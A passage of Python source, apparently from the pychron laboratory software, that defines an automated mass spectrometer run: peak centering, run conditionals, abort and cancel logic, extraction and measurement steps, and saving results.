peak_center_threshold=None,
peak_center_threshold_window=None,
**kw):
if not self._alive:
return
if check_intensity is None:
check_intensity = self.use_peak_center_threshold
if peak_center_threshold is None:
peak_center_threshold = self.peak_center_threshold
if peak_center_threshold_window is None:
peak_center_threshold_window = self.peak_center_threshold_window
ion = self.ion_optics_manager
if ion is not None:
if self.isotope_group and check_intensity:
iso = self.isotope_group.get_isotope(isotope, detector)
if iso:
ys = iso.ys[-peak_center_threshold_window:]
ym = ys.mean()
self.debug('peak center: mean={} threshold={}'.format(ym, self.peak_center_threshold))
if ym < peak_center_threshold:
self.warning(
'Skipping peak center. intensities too small. {}<{}'.format(ym, self.peak_center_threshold))
return
else:
self.debug('No isotope="{}", Det="{}" in isotope group. {}'.format(isotope, detector,
self.isotope_group.isotope_keys))
if not self.plot_panel:
p = self._new_plot_panel(self.plot_panel, stack_order='top_to_bottom')
self.plot_panel = p
self.debug('peak center started')
ad = [di.name for di in self._peak_center_detectors
if di.name != detector]
pc = ion.setup_peak_center(detector=[detector] + ad,
plot_panel=self.plot_panel,
isotope=isotope,
directions=directions,
config_name=config_name,
use_configuration_dac=False,
**kw)
self.peak_center = pc
self.debug('do peak center. {}'.format(pc))
ion.do_peak_center(new_thread=False, save=save, message='automated run peakcenter', timeout=300)
self._update_persister_spec(peak_center=pc)
if pc.result:
self.persister.save_peak_center_to_file(pc)
def py_coincidence_scan(self):
pass
# sm = self.spectrometer_manager
# obj, t = sm.do_coincidence_scan()
# self.coincidence_scan = obj
# t.join()
# ===============================================================================
# conditionals
# ===============================================================================
def py_add_cancelation(self, **kw):
"""
cancel experiment if teststr evaluates to true
"""
self._conditional_appender('cancelation', kw, CancelationConditional, level=RUN,
location=self.measurement_script.name)
def py_add_action(self, **kw):
"""
attr must be an attribute of arar_age
perform a specified action if teststr evaluates to true
"""
self._conditional_appender('action', kw, ActionConditional, level=RUN,
location=self.measurement_script.name)
def py_add_termination(self, **kw):
"""
attr must be an attribute of arar_age
terminate run and continue experiment if teststr evaluates to true
"""
self._conditional_appender('termination', kw, TerminationConditional, level=RUN,
location=self.measurement_script.name)
def py_add_truncation(self, **kw):
"""
attr must be an attribute of arar_age
truncate measurement and continue run if teststr evaluates to true
default kw:
attr='', comp='',start_count=50, frequency=5,
abbreviated_count_ratio=1.0
"""
self._conditional_appender('truncation', kw, TruncationConditional, level=RUN,
location=self.measurement_script.name)
def py_clear_conditionals(self):
self.debug('$$$$$ Clearing conditionals')
self.py_clear_terminations()
self.py_clear_truncations()
self.py_clear_actions()
self.py_clear_cancelations()
def py_clear_cancelations(self):
self.cancelation_conditionals = []
def py_clear_terminations(self):
self.termination_conditionals = []
def py_clear_truncations(self):
self.truncation_conditionals = []
def py_clear_actions(self):
self.action_conditionals = []
def py_clear_modifications(self):
self.modification_conditionals = []
# ===============================================================================
# run termination
# ===============================================================================
def set_end_after(self):
self.is_last = True
self.executor_event = {'kind': 'end_after'}
def abort_run(self, do_post_equilibration=True):
self._aborted = True
self.debug('Abort run do_post_equilibration={}'.format(do_post_equilibration))
self._persister_action('trait_set', save_enabled=False)
for s in EM_SCRIPT_KEYS:
script = getattr(self, '{}_script'.format(s))
if script is not None:
script.abort()
if self.peak_center:
self.debug('cancel peak center')
self.peak_center.cancel()
self.do_post_termination(do_post_equilibration=do_post_equilibration)
self.finish()
if self.spec.state != 'not run':
self.spec.state = 'aborted'
self.experiment_queue.refresh_table_needed = True
def cancel_run(self, state='canceled', do_post_equilibration=True):
"""
terminate the measurement script immediately
do post termination
post_eq and post_meas
don't save run
"""
self.debug('Cancel run state={} do_post_equilibration={}'.format(state, do_post_equilibration))
self.collector.canceled = True
self._persister_action('trait_set', save_enabled=False)
for s in EM_SCRIPT_KEYS:
script = getattr(self, '{}_script'.format(s))
if script is not None:
script.cancel()
if self.peak_center:
self.debug('cancel peak center')
self.peak_center.cancel()
self.do_post_termination(do_post_equilibration=do_post_equilibration)
self.finish()
if state:
if self.spec.state != 'not run':
self.spec.state = state
self.experiment_queue.refresh_table_needed = True
def truncate_run(self, style='normal'):
"""
truncate the measurement script
style:
normal- truncate current measure iteration and continue
quick- truncate current measure iteration use truncated_counts for following
measure iterations
"""
if self.measuring:
style = style.lower()
if style == 'normal':
self.measurement_script.truncate('normal')
elif style == 'quick':
self.measurement_script.truncate('quick')
self.collector.set_truncated()
self.truncated = True
self.spec.state = 'truncated'
self.experiment_queue.refresh_table_needed = True
# ===============================================================================
#
# ===============================================================================
def show_conditionals(self, tripped=None):
self.tripped_conditional = tripped
self.executor_event = {'kind': 'show_conditionals', 'tripped': tripped}
def teardown(self):
self.debug('tear down')
if self.measurement_script:
self.measurement_script.automated_run = None
if self.extraction_script:
self.extraction_script.automated_run = None
if self.collector:
self.collector.automated_run = None
if self.plot_panel:
self.plot_panel.automated_run = None
self._persister_action('trait_set', persistence_spec=None, monitor=None)
def finish(self):
self.debug('----------------- finish -----------------')
if self.monitor:
self.monitor.stop()
if self.spec:
if self.spec.state not in ('not run', 'canceled', 'success', 'truncated', 'aborted'):
self.spec.state = 'failed'
self.experiment_queue.refresh_table_needed = True
self.spectrometer_manager.spectrometer.active_detectors = []
self.stop()
def stop(self):
self.debug('----------------- stop -----------------')
self._alive = False
self.collector.stop()
def start(self):
self.debug('----------------- start -----------------')
self._aborted = False
self.persistence_spec = PersistenceSpec()
for p in (self.persister, self.xls_persister, self.dvc_persister):
if p is not None:
p.per_spec = self.persistence_spec
if self.monitor is None:
return self._start()
if self.monitor.monitor():
try:
return self._start()
except AttributeError as e:
self.warning('failed starting run: {}'.format(e))
else:
self.warning('failed to start monitor')
def is_alive(self):
return self._alive
def heading(self, msg, color=None, *args, **kw):
super(AutomatedRun, self).info(msg, *args, **kw)
if color is None:
color = self.info_color
if color is None:
color = 'light green'
self.executor_event = {'kind': 'heading', 'message': msg, 'color': color, 'log': False}
def info(self, msg, color=None, *args, **kw):
super(AutomatedRun, self).info(msg, *args, **kw)
if color is None:
color = self.info_color
if color is None:
color = 'light green'
self.executor_event = {'kind': 'info', 'message': msg, 'color': color, 'log': False}
def get_interpolation_value(self, value):
"""
value is a string in the format of $VALUE. Search for VALUE first in the options file
        then in the extraction script's metadata
:param value:
:return:
"""
v = None
if self.extraction_script:
for vv in (value, value.upper(), value.lower()):
try:
v = getattr(self.extraction_script, vv)
except AttributeError:
v = self._get_extraction_parameter(vv, None)
if v is None:
continue
break
if v is None:
            self.warning('Could not interpolate {}. Make sure value is defined in either the options file '
                         'or embedded in the extraction script\'s metadata. Defaulting to 0'.format(value))
v = 0
return v
def get_ratio(self, r, non_ic_corr=True):
if self.isotope_group:
return self.isotope_group.get_ratio(r, non_ic_corr=non_ic_corr)
def get_reference_peakcenter_result(self):
if self.persistence_spec:
pc = self.persistence_spec.peak_center
if pc:
rn = pc.reference_detector.name
return pc.get_result(rn)
def get_device_value(self, dev_name):
return self.extraction_line_manager.get_device_value(dev_name)
def get_pressure(self, attr):
controller, name = attr.split('.')
return self.extraction_line_manager.get_pressure(controller, name)
def get_deflection(self, det, current=False):
return self.spectrometer_manager.spectrometer.get_deflection(det, current)
def get_detector(self, det):
return self.spectrometer_manager.spectrometer.get_detector(det)
def set_integration_time(self, v):
spectrometer = self.spectrometer_manager.spectrometer
nv = spectrometer.set_integration_time(v, force=True)
self._integration_seconds = nv
def set_magnet_position(self, *args, **kw):
return self._set_magnet_position(*args, **kw)
def set_deflection(self, det, defl):
self.spectrometer_manager.set_deflection(det, defl)
def protect_detector(self, det, protect):
self.spectrometer_manager.protect_detector(det, protect)
def wait(self, t, msg=''):
self.executor_event = {'kind': 'wait', 'duration': t, 'message': msg}
def wait_for_overlap(self):
"""
by default overlap_evt is set
        after equilibration is finished
"""
self.info('waiting for overlap signal')
self._alive = True
self.overlap_evt = evt = TEvent()
evt.clear()
i = 1
st = time.time()
while self._alive and not evt.is_set():
time.sleep(1)
if i % 5 == 0:
et = time.time() - st
self.debug('waiting for overlap signal. elapsed time={:0.2f}'.format(et))
i = 0
i += 1
if not self._alive:
return
self.info('overlap signal set')
overlap, mp = self.spec.overlap
self.info('starting overlap delay {}'.format(overlap))
starttime = time.time()
i = 1
while self._alive:
et = time.time() - starttime
if et > overlap:
break
time.sleep(1.0)
if i % 50 == 0:
self.debug('waiting overlap delay {}. elapsed time={:0.2f}'.format(overlap, et))
i = 0
i += 1
def post_finish(self):
if self.use_dvc_persistence:
if self.log_path:
self.dvc_persister.save_run_log_file(self.log_path)
else:
self.debug('no log path to save')
def save(self):
self.debug('post measurement save measured={} aborted={}'.format(self._measured, self._aborted))
if self._measured and not self._aborted:
# set filtering
self._set_filtering()
conds = (self.termination_conditionals, self.truncation_conditionals,
self.action_conditionals, self.cancelation_conditionals, self.modification_conditionals)
env = self._get_environmentals()
if env:
set_environmentals(self.spec, env)
self._update_persister_spec(active_detectors=self._active_detectors,
conditionals=[c for cond in conds for c in cond],
tripped_conditional=self.tripped_conditional, **env)
# save to database
self._persister_save_action('post_measurement_save')
self.spec.new_result(self)
if self.plot_panel:
self.plot_panel.analysis_view.refresh_needed = True
if self.persister.secondary_database_fail:
self.executor_event = {'kind': 'cancel', 'cancel_run': True,
'msg': self.persister.secondary_database_fail}
else:
return True
else:
return True
# ===============================================================================
# setup
# ===============================================================================
def setup_persister(self):
sens = self._get_extraction_parameter('sensitivity_multiplier', default=1)
        # setup persister. mirror a few of AutomatedRun's attributes
script_name, script_blob = self._assemble_script_blob()
eqn, eqb = '', ''
queue = self.experiment_queue
eqn = queue.name
auto_save_detector_ic = queue.auto_save_detector_ic
self.debug('$$$$$$$$$$$$$$$ auto_save_detector_ic={}'.format(auto_save_detector_ic))
ext_name, ext_blob = '', ''
if self.extraction_script:
ext_name = self.extraction_script.name
ext_blob = self._assemble_extraction_blob()
ms_name, ms_blob, sfods, bsfods = '', '', {}, {}
hops_name, hops_blob = '', ''
if self.measurement_script:
ms_name = self.measurement_script.name
ms_blob = self.measurement_script.toblob()
hops_name = self.measurement_script.hops_name
hops_blob = self.measurement_script.hops_blob
sfods, bsfods = self._get_default_fods()
pe_name, pe_blob = '', ''
if self.post_equilibration_script:
pe_name = self.post_equilibration_script.name
pe_blob = self.post_equilibration_script.toblob()
pm_name, pm_blob = '', ''
if self.post_measurement_script:
pm_name = self.post_measurement_script.name
pm_blob = self.post_measurement_script.toblob()
ext_pos = []
if self.extraction_script:
ext_pos = self.extraction_script.get_extraction_positions()
self._update_persister_spec(save_as_peak_hop=False,
run_spec=self.spec,
isotope_group=self.isotope_group,
positions=self.spec.get_position_list(),
auto_save_detector_ic=auto_save_detector_ic,
extraction_positions=ext_pos,
sensitivity_multiplier=sens,
experiment_type=self.experiment_type,
experiment_queue_name=eqn,
experiment_queue_blob=eqb,
extraction_name=ext_name,
extraction_blob=ext_blob,
measurement_name=ms_name,
measurement_blob=ms_blob,
post_measurement_name=pm_name,
post_measurement_blob=pm_blob,
post_equilibration_name=pe_name,
post_equilibration_blob=pe_blob,
hops_name=hops_name,
hops_blob=hops_blob,
runscript_name=script_name,
runscript_blob=script_blob,
signal_fods=sfods,
baseline_fods=bsfods,
intensity_scalar=self.intensity_scalar,
laboratory=self.laboratory,
instrument_name=self.instrument_name)
# ===============================================================================
# doers
# ===============================================================================
def start_extraction(self):
return self._start_script(EXTRACTION)
def start_measurement(self):
return self._start_script(MEASUREMENT)
def do_extraction(self):
self.debug('do extraction')
self._persister_action('pre_extraction_save')
self.info_color = EXTRACTION_COLOR
script = self.extraction_script
msg = 'Extraction Started {}'.format(script.name)
self.heading('{}'.format(msg))
self.spec.state = 'extraction'
self.experiment_queue.refresh_table_needed = True
self.debug('DO EXTRACTION {}'.format(self.runner))
script.set_run_identifier(self.runid)
queue = self.experiment_queue
script.set_load_identifier(queue.load_name)
syn_extractor = None
if script.syntax_ok(warn=False):
if self.use_syn_extraction and self.spec.syn_extraction:
p = os.path.join(paths.scripts_dir, 'syn_extraction', self.spec.syn_extraction)
p = add_extension(p, '.yaml')
if os.path.isfile(p):
from pychron.experiment.automated_run.syn_extraction import SynExtractionCollector
dur = script.calculate_estimated_duration(force=True)
syn_extractor = SynExtractionCollector(arun=weakref.ref(self)(),
path=p,
extraction_duration=dur)
syn_extractor.start()
else:
self.warning(
'Cannot start syn extraction collection. Configuration file does not exist. {}'.format(p))
else:
self.warning('Invalid script syntax for "{}"'.format(script.name))
return
try:
ex_result = script.execute()
except ExtractionException as e:
ex_result = False
self.debug('extraction exception={}'.format(e))
if ex_result:
if syn_extractor:
syn_extractor.stop()
# report the extraction results
ach, req = script.output_achieved()
self.info('Requested Output= {:0.3f}'.format(req))
self.info('Achieved Output= {:0.3f}'.format(ach))
rblob = script.get_response_blob()
oblob = script.get_output_blob()
sblob = script.get_setpoint_blob()
snapshots = script.snapshots
videos = script.videos
grain_polygons = script.get_grain_polygons() or []
self.debug('grain polygons n={}'.format(len(grain_polygons)))
pid = script.get_active_pid_parameters()
self._update_persister_spec(pid=pid or '',
grain_polygons=grain_polygons,
power_achieved=ach,
response_blob=rblob,
output_blob=oblob,
setpoint_blob=sblob,
snapshots=snapshots,
videos=videos)
self._persister_save_action('post_extraction_save')
self.heading('Extraction Finished')
self.info_color = None
# if overlapping, need to wait for the previous run's min mass spec pump time
self._wait_for_min_ms_pumptime()
else:
if syn_extractor:
syn_extractor.stop()
self.do_post_equilibration()
self.do_post_measurement()
self.finish()
self.heading('Extraction Finished unsuccessfully', color='red')
self.info_color = None
return bool(ex_result)
def do_measurement(self, script=None, use_post_on_fail=True):
self.debug('do measurement')
self.debug('L#={} analysis type={}'.format(self.spec.labnumber,
self.spec.analysis_type))
if not self._alive:
self.warning('run is not alive')
return
if script is None:
script = self.measurement_script
if script is None:
self.warning('no measurement script')
return
# use a measurement_script to explicitly define
# measurement sequence
self.info_color = MEASUREMENT_COLOR
msg = 'Measurement Started {}'.format(script.name)
self.heading('{}'.format(msg))
self.spec.state = MEASUREMENT
self.experiment_queue.refresh_table_needed = True
# get current spectrometer values
sm = self.spectrometer_manager
if sm:
self.debug('setting trap, emission, spec, defl, and gains')
self._update_persister_spec(spec_dict=sm.make_configuration_dict(),
defl_dict=sm.make_deflections_dict(),
settings=sm.make_settings(),
gains=sm.make_gains_dict(),
trap=sm.read_trap_current(),
emission=sm.read_emission())
self._persister_action('pre_measurement_save')
self.measuring = True
self._persister_action('trait_set', save_enabled=True)
if script.execute():
# mem_log('post measurement execute')
self.heading('Measurement Finished')
self.measuring = False
self.info_color = None
self._measured = True
return True
else:
if use_post_on_fail:
self.do_post_equilibration()
self.do_post_measurement()
self.finish()
self.heading('Measurement Finished unsuccessfully. Aborted={}'.format(self._aborted), color='red')
self.measuring = False
self.info_color = None
return self._aborted
def do_post_measurement(self, script=None):
if script is None:
script = self.post_measurement_script
if not script:
return True
if not self._alive:
return
msg = 'Post Measurement Started {}'.format(script.name)
self.heading('{}'.format(msg))
if script.execute():
self.debug('setting _ms_pumptime')
self.executor_event = {'kind': 'ms_pumptime_start', 'time': time.time()}
self.heading('Post Measurement Finished')
return True
else:
self.heading('Post Measurement Finished unsuccessfully')
return False
def do_post_equilibration(self, block=False):
if block:
self._post_equilibration()
else:
t = Thread(target=self._post_equilibration,
name='post_equil')
t.daemon = True
t.start()
def do_post_termination(self, do_post_equilibration=True):
self.heading('Post Termination Started')
if do_post_equilibration:
self.do_post_equilibration()
self.do_post_measurement()
self.stop()
self.heading('Post Termination Finished')
# ===============================================================================
# utilities
# ===============================================================================
def get_current_dac(self):
return self.spectrometer_manager.spectrometer.magnet.dac
def assemble_report(self):
signal_string = ''
signals = self.get_baseline_corrected_signals()
if signals:
signal_string = '\n'.join(['{} {} {}'.format(ai.name, ai.isotope,
signals[ai.isotope])
for ai in self._active_detectors])
age = ''
if self.isotope_group:
age = self.isotope_group.age
age_string = 'age={}'.format(age)
return '''runid={} timestamp={} {}
analysis_type={}
# ===============================================================================
# signals
# ===============================================================================
{}
{}
'''.format(self.runid, self.persister.rundate, self.persister.runtime,
self.spec.analysis_type,
signal_string, age_string)
def get_baseline_corrected_signals(self):
if self.isotope_group:
d = dict()
for k, iso in self.isotope_group.items():
d[k] = (iso.detector, iso.get_baseline_corrected_value())
return d
def setup_context(self, *args, **kw):
self._setup_context(*args, **kw)
def refresh_scripts(self):
self._refresh_scripts()
def update_detector_isotope_pairing(self, detectors, isotopes):
self.debug('update detector isotope pairing')
self.debug('detectors={}'.format(detectors))
self.debug('isotopes={}'.format(isotopes))
for di in self._active_detectors:
di.isotope = ''
for di, iso in zip(detectors, isotopes):
self.debug('updating pairing {} - {}'.format(di, iso))
det = self.get_detector(di)
det.isotope = iso
# ===============================================================================
# private
# ===============================================================================
def _get_environmentals(self):
self.info('getting environmentals')
env = {}
lclient = self.labspy_client
tst = time.time()
if lclient:
if lclient.connect():
for tag in ('lab_temperatures', 'lab_humiditys', 'lab_pneumatics'):
st = time.time()
try:
env[tag] = getattr(lclient, 'get_latest_{}'.format(tag))()
self.debug('Get latest {}. elapsed: {}'.format(tag, time.time() - st))
except BaseException as e:
self.debug('Get Labspy Environmentals: {}'.format(e))
self.debug_exception()
else:
self.debug('failed to connect to labspy client. Could not retrieve environmentals')
self.debug('Environmentals: {}'.format(pformat(env)))
else:
self.debug('LabspyClient not enabled. Could not retrieve environmentals')
self.info('getting environmentals finished: total duration: {}'.format(time.time() - tst))
return env
def _start(self):
# for testing only
# self._get_environmentals()
if self.isotope_group is None:
# load arar_age object for age calculation
if self.experiment_type == AR_AR:
from pychron.processing.arar_age import ArArAge
klass = ArArAge
else:
from pychron.processing.isotope_group import IsotopeGroup
klass = IsotopeGroup
self.isotope_group = klass()
es = self.extraction_script
if es is not None:
# get sensitivity multiplier from extraction script
v = self._get_yaml_parameter(es, 'sensitivity_multiplier', default=1)
self.isotope_group.sensitivity_multiplier = v
ln = self.spec.labnumber
ln = convert_identifier(ln)
self.debug('**************** Experiment Type: {}, {}'.format(self.experiment_type, AR_AR))
if self.experiment_type == AR_AR:
if not self.datahub.load_analysis_backend(ln, self.isotope_group):
self.debug('failed load analysis backend')
return
self.isotope_group.calculate_decay_factors()
self.py_clear_conditionals()
# setup default/queue conditionals
# clear the conditionals for good measure.
# conditionals should be cleared during teardown.
try:
self._add_conditionals()
except BaseException as e:
self.warning('Failed adding conditionals {}'.format(e))
return
try:
# add queue conditionals
self._add_queue_conditionals()
except BaseException as e:
self.warning('Failed adding queue conditionals. err={}'.format(e))
return
try:
# add default conditionals
self._add_system_conditionals()
except BaseException as e:
self.warning('Failed adding system conditionals. err={}'.format(e))
return
self.info('Start automated run {}'.format(self.runid))
self.measuring = False
self.truncated = False
self._alive = True
if self.plot_panel:
self.plot_panel.start()
# self.plot_panel.set_analysis_view(self.experiment_type)
self.multi_collector.canceled = False
self.multi_collector.is_baseline = False
self.multi_collector.for_peak_hop = False
self._equilibration_done = False
# setup the scripts
ip = self.spec.script_options
if ip:
ip = os.path.join(paths.scripts_dir, 'options', add_extension(ip, '.yaml'))
if self.measurement_script:
self.measurement_script.reset(self)
# set the interpolation path
self.measurement_script.interpolation_path = ip
for si in ('extraction', 'post_measurement', 'post_equilibration'):
script = getattr(self, '{}_script'.format(si))
if script:
self._setup_context(script)
script.interpolation_path = ip
# load extraction metadata
self.eqtime = self._get_extraction_parameter('eqtime', -1)
self.time_zero_offset = self.spec.collection_time_zero_offset
# setup persister. mirror a few of AutomatedRun's attributes
self.setup_persister()
return True
def _set_filtering(self):
self.debug('Set filtering')
def _get_filter_outlier_dict(iso, kind):
if kind == 'baseline':
fods = self.persistence_spec.baseline_fods
key = iso.detector
else:
fods = self.persistence_spec.signal_fods
key = iso.name
try:
fod = fods[key]
except KeyError:
fod = {'filter_outliers': False, 'iterations': 1, 'std_devs': 2}
return fod
for i in self.isotope_group.values():
fod = _get_filter_outlier_dict(i, 'signal')
self.debug('setting fod for {}= {}'.format(i.name, fod))
i.set_filtering(fod)
fod = _get_filter_outlier_dict(i, 'baseline')
i.baseline.set_filtering(fod)
self.debug('setting fod for {}= {}'.format(i.detector, fod))
def _update_persister_spec(self, **kw):
ps = self.persistence_spec
for k, v in kw.items():
try:
ps.trait_set(**{k: v})
except TraitError as e:
self.warning('failed setting persistence spec attr={}, value={} error={}'.format(k, v, e))
def _persister_save_action(self, func, *args, **kw):
self.debug('persistence save...')
if self.use_db_persistence:
self.debug('persistence save - db')
getattr(self.persister, func)(*args, **kw)
if self.use_dvc_persistence:
self.debug('persistence save - dvc')
getattr(self.dvc_persister, func)(*args, **kw)
if self.use_xls_persistence:
self.debug('persistence save - xls')
getattr(self.xls_persister, func)(*args, **kw)
def _persister_action(self, func, *args, **kw):
getattr(self.persister, func)(*args, **kw)
for i, p in enumerate((self.xls_persister, self.dvc_persister)):
if p is None:
continue
try:
getattr(p, func)(*args, **kw)
except BaseException as e:
self.warning('{} persister action failed. {} func={}, excp={}'.format(i, p.__class__.__name__,
func, e))
import traceback
traceback.print_exc()
def _post_equilibration(self):
if self._equilibration_done:
return
self._equilibration_done = True
if not self._alive:
return
if self.post_equilibration_script is None:
return
msg = 'Post Equilibration Started {}'.format(self.post_equilibration_script.name)
self.heading('{}'.format(msg))
if self.post_equilibration_script.execute():
self.heading('Post Equilibration Finished')
else:
self.heading('Post Equilibration Finished unsuccessfully')
def _generate_ic_mftable(self, detectors, refiso, peak_center_config, n):
ret = True
from pychron.experiment.ic_mftable_generator import ICMFTableGenerator
e = ICMFTableGenerator()
if not e.make_mftable(self, detectors, refiso, peak_center_config, n):
ret = False
return ret
def _add_system_conditionals(self):
self.debug('add default conditionals')
p = get_path(paths.spectrometer_dir, '.*conditionals', ('.yaml', '.yml'))
if p is not None:
self.info('adding default conditionals from {}'.format(p))
self._add_conditionals_from_file(p, level=SYSTEM)
else:
self.warning('no Default Conditionals file. {}'.format(p))
def _add_queue_conditionals(self):
"""
load queue global conditionals (truncations, actions, terminations)
"""
self.debug('Add queue conditionals')
name = self.spec.queue_conditionals_name
if test_queue_conditionals_name(name):
p = get_path(paths.queue_conditionals_dir, name, ('.yaml', '.yml'))
if p is not None:
self.info('adding queue conditionals from {}'.format(p))
self._add_conditionals_from_file(p, level=QUEUE)
else:
self.warning('Invalid Conditionals file. {}'.format(p))
def _add_conditionals_from_file(self, p, level=None):
d = conditionals_from_file(p, level=level)
for k, v in d.items():
if k in ('actions', 'truncations', 'terminations', 'cancelations'):
var = getattr(self, '{}_conditionals'.format(k[:-1]))
var.extend(v)
def _conditional_appender(self, name, cd, klass, level=None, location=None):
if not self.isotope_group:
self.warning('No isotope group to use for conditional testing')
return
attr = cd.get('attr')
if not attr:
self.debug('no attr for this {} cd={}'.format(name, cd))
return
if attr == 'age' and self.spec.analysis_type not in ('unknown', 'cocktail'):
self.debug('not adding because analysis_type is not unknown or cocktail')
return
# don't check if isotope_group has the attribute. it may be added to isotope group later
obj = getattr(self, '{}_conditionals'.format(name))
con = conditional_from_dict(cd, klass, level=level, location=location)
if con:
self.info('adding {} attr="{}" '
'test="{}" start="{}"'.format(name, con.attr, con.teststr, con.start_count))
obj.append(con)
else:
self.warning('Failed adding {}, {}'.format(name, cd))
def _refresh_scripts(self):
for name in SCRIPT_KEYS:
setattr(self, '{}_script'.format(name), self._load_script(name))
def _get_default_fits_file(self):
p = self._get_measurement_parameter('default_fits')
if p:
dfp = os.path.join(paths.fits_dir, add_extension(p, '.yaml'))
if os.path.isfile(dfp):
return dfp
else:
self.warning_dialog('Cannot open default fits file: {}'.format(dfp))
def _get_default_fits(self, is_baseline=False):
"""
get name of default fits file from measurement docstr
return dict of iso:fit pairs
"""
dfp = self._get_default_fits_file()
if dfp:
self.debug('using default fits file={}'.format(dfp))
yd = yload(dfp)
key = 'baseline' if is_baseline else 'signal'
fd = {yi['name']: (yi['fit'], yi['error_type']) for yi in yd[key]}
else:
self.debug('no default fits file')
fd = {}
return fd
def _get_default_fods(self):
def extract_fit_dict(fods, yd):
for yi in yd:
fod = {'filter_outliers': yi.get('filter_outliers', False),
'iterations': yi.get('filter_iterations', 0),
'std_devs': yi.get('filter_std_devs', 0)}
fods[yi['name']] = fod
sfods, bsfods = {}, {}
dfp = self._get_default_fits_file()
if dfp:
ys = yload(dfp)
extract_fit_dict(sfods, ys['signal'])
extract_fit_dict(bsfods, ys['baseline'])
return sfods, bsfods
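# A hedged sketch of the default-fits YAML layout assumed by the two readers
# above; the isotope names and fit values are illustrative, only the keys
# ('name', 'fit', 'error_type', 'filter_outliers', 'filter_iterations',
# 'filter_std_devs') come from the code:
#
# signal:
#   - {name: Ar40, fit: linear, error_type: SEM,
#      filter_outliers: true, filter_iterations: 1, filter_std_devs: 2}
# baseline:
#   - {name: Ar40, fit: average, error_type: SEM}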
def _start_script(self, name):
script = getattr(self, '{}_script'.format(name))
self.debug('start {}'.format(name))
if not self._alive:
self.warning('run is not alive')
return
if not script:
self.warning('no {} script'.format(name))
return
return True
def _add_active_detector(self, di):
spec = self.spectrometer_manager.spectrometer
det = spec.get_detector(di)
if det not in self._active_detectors:
self._active_detectors.append(det)
def _set_active_detectors(self, dets):
spec = self.spectrometer_manager.spectrometer
return [spec.get_detector(n) for n in dets]
def _define_detectors(self, isotope, det):
if self.spectrometer_manager:
spec = self.spectrometer_manager.spectrometer
spec.update_isotopes(isotope, det)
def _activate_detectors(self, dets):
"""
!!! this is a potential problem !!!
need more sophisticated way to set up plot panel
e.g PP has detectors H1, AX but AX, CDD are active.
need to remove H1 and add CDD.
or
if memory leak not a problem simply always "create" new plots
instead of only clearing data.
or use both techniques
if plot panel detectors != active detectors "create"
"""
self.debug('activate detectors')
if self.plot_panel is None:
create = True
else:
cd = set([d.name for d in self.plot_panel.detectors])
ad = set(dets)
create = cd - ad or ad - cd
p = self._new_plot_panel(self.plot_panel, stack_order='top_to_bottom')
self.plot_panel = p
self._active_detectors = self._set_active_detectors(dets)
self.spectrometer_manager.spectrometer.active_detectors = self._active_detectors
if create:
p.create(self._active_detectors)
else:
p.isotope_graph.clear_plots()
self.debug('clear isotope group')
self.isotope_group.clear_isotopes()
self.isotope_group.clear_error_components()
self.isotope_group.clear_blanks()
cb = not any(self.spec.analysis_type.startswith(at) for at in NO_BLANK_CORRECT)
for d in self._active_detectors:
self.debug('setting isotope det={}, iso={}'.format(d.name, d.isotope))
self.isotope_group.set_isotope(d.isotope, d.name, (0, 0), correct_for_blank=cb)
self._load_previous()
self.debug('load analysis view')
p.analysis_view.load(self)
def _load_previous(self):
if not self.spec.analysis_type.startswith('blank') and not self.spec.analysis_type.startswith('background'):
pid, blanks, runid = self.previous_blanks
self.debug('setting previous blanks')
for iso, v in blanks.items():
self.isotope_group.set_blank(iso, v[0], v[1])
self._update_persister_spec(previous_blank_id=pid,
previous_blanks=blanks,
previous_blank_runid=runid)
self.isotope_group.clear_baselines()
baselines = self.previous_baselines
for iso, v in baselines.items():
self.isotope_group.set_baseline(iso, v[0], v[1])
def _add_conditionals(self):
klass_dict = {'actions': ActionConditional, 'truncations': TruncationConditional,
'terminations': TerminationConditional, 'cancelations': CancelationConditional,
'modifications': QueueModificationConditional}
t = self.spec.conditionals
self.debug('adding conditionals {}'.format(t))
if t:
p = os.path.join(paths.conditionals_dir, add_extension(t, '.yaml'))
if os.path.isfile(p):
self.debug('extract conditionals from file. {}'.format(p))
yd = yload(p)
failure = False
for kind, items in yd.items():
try:
klass = klass_dict[kind]
except KeyError:
self.debug('Invalid conditional kind="{}"'.format(kind))
continue
for cd in items:
try:
# trim off s
if kind.endswith('s'):
kind = kind[:-1]
self._conditional_appender(kind, cd, klass, location=p)
except BaseException as e:
self.debug('Failed adding {}. excp="{}", cd={}'.format(kind, e, cd))
failure = True
if failure:
if not self.confirmation_dialog('Failed to add Conditionals. Would you like to continue?'):
self.cancel_run(do_post_equilibration=False)
else:
try:
c, start = t.split(',')
pat = '<=|>=|[<>=]'
attr = re.split(pat, c)[0]
freq = 1
acr = 0.5
except Exception as e:
self.debug('conditionals parse failed {} {}'.format(e, t))
return
self.py_add_truncation(attr=attr, teststr=c,
start_count=int(start),
frequency=freq,
abbreviated_count_ratio=acr)
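# A minimal example of the shorthand conditional string parsed in the else
# branch above, assuming the '<attr><op><value>, <start_count>' form implied
# by the split and regex:
#   t = 'age<10.0, 50'  ->  attr='age', teststr='age<10.0', start=50
# with the hard-coded frequency=1 and abbreviated_count_ratio=0.5.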
def _get_measurement_parameter(self, key, default=None):
return self._get_yaml_parameter(self.measurement_script, key, default)
def _get_extraction_parameter(self, key, default=None):
return self._get_yaml_parameter(self.extraction_script, key, default)
def _new_plot_panel(self, plot_panel, stack_order='bottom_to_top'):
title = self.runid
sample, irradiation = self.spec.sample, self.spec.display_irradiation
if sample:
title = '{} {}'.format(title, sample)
if irradiation:
title = '{} {}'.format(title, irradiation)
if plot_panel is None:
from pychron.experiment.plot_panel import PlotPanel
plot_panel = PlotPanel(
stack_order=stack_order,
info_func=self.info,
isotope_group=self.isotope_group)
self.debug('*************** Set Analysis View {}'.format(self.experiment_type))
plot_panel.set_analysis_view(self.experiment_type,
analysis_type=self.spec.analysis_type,
analysis_id=self.runid)
# an = plot_panel.analysis_view
# an.load(self)
plot_panel.trait_set(plot_title=title)
return plot_panel
def _convert_valve(self, valve):
if isinstance(valve, int):
valve = str(valve)
if valve and not isinstance(valve, (tuple, list)):
if ',' in valve:
valve = [v.strip() for v in valve.split(',')]
else:
valve = (valve,)
return valve
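# Assumed behavior of the normalization above (valve names are illustrative):
#   _convert_valve(3)       -> ('3',)
#   _convert_valve('A')     -> ('A',)
#   _convert_valve('A, B')  -> ['A', 'B']
#   _convert_valve(['A'])   -> ['A']   # tuples/lists pass through unchanged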
def _equilibrate(self, evt, eqtime=15, inlet=None, outlet=None,
delay=3,
do_post_equilibration=True, close_inlet=True):
